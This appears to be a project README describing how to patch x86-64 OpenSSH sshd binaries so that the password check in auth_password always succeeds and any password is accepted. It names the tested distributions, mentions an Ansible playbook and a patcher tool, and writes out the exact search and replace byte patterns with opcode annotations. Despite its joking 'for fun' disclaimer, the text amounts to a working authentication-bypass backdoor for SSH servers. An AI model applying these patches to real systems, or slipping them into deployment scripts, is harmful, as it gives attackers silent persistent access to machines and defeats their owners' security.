⚠️ This project was an experiment purely for fun and should be treated as such. Do NOT put in production!
Ever wondered what happens if SSHd has a little too much to drink? Well, it starts accepting any password as valid. This repo contains generic byte replace patterns that will patch any x86-64 sshd binary to accept any password as valid.
Although the patterns are as generic as possible, they are only for x86-64 and may not work on all OpenSSH versions. Tested versions are as follows:
- Lubuntu 19.10
- Kali 2019.4
- Linux Mint 19.3 XFCE
The tested binaries can be found in samples.
Check out the provided Ansible playbook.
Use my byte pattern patcher with this patch file and target your sshd binary. You should see three replaced occurances, one for each pattern.
The patterns will patch all exit routines in auth-passwd.c's
int auth_password(struct ssh *ssh, const char *password)to return true, therefore authenticated.
- Patch auth_password exit routine 1
31 ?? 85 ?? 0f 95 ?? 21 ??
31 ?? ?? ?? b8 01 00 00 00
31 [11......] // XOR
85 [11......] // TEST
0f 95 [11......] // SETNZ -> MOV EAX, 0x1
21 [11......] // AND -> OVERWRITTEN
- Patch auth_password exit routine 2
- 2 variations (check patch file)
21 ?? 0f b6 ?? eb ??
b8 01 00 00 00 ?? ??
21 [11......] // AND -> MOV EAX, 0x1
0f b6 [11......] // MOVZX -> OVERWRITTEN
eb [........] // JMP
- Patch auth_password exit routine 3
- 2 variations (check patch file)
85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8B ?? ?? ?? ?? ?? 85 ??
85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8B ?? ?? ?? ?? ?? 39 ??
85 [11......] // TEST
0f 95 [11......] // SETNZ
83 3d [........] [........] [........] [........] 01 // CMP
74 [........] // JZ
8b [00...101] [........] [........] [........] [........] // MOV
85 [11......] // TEST -> CMP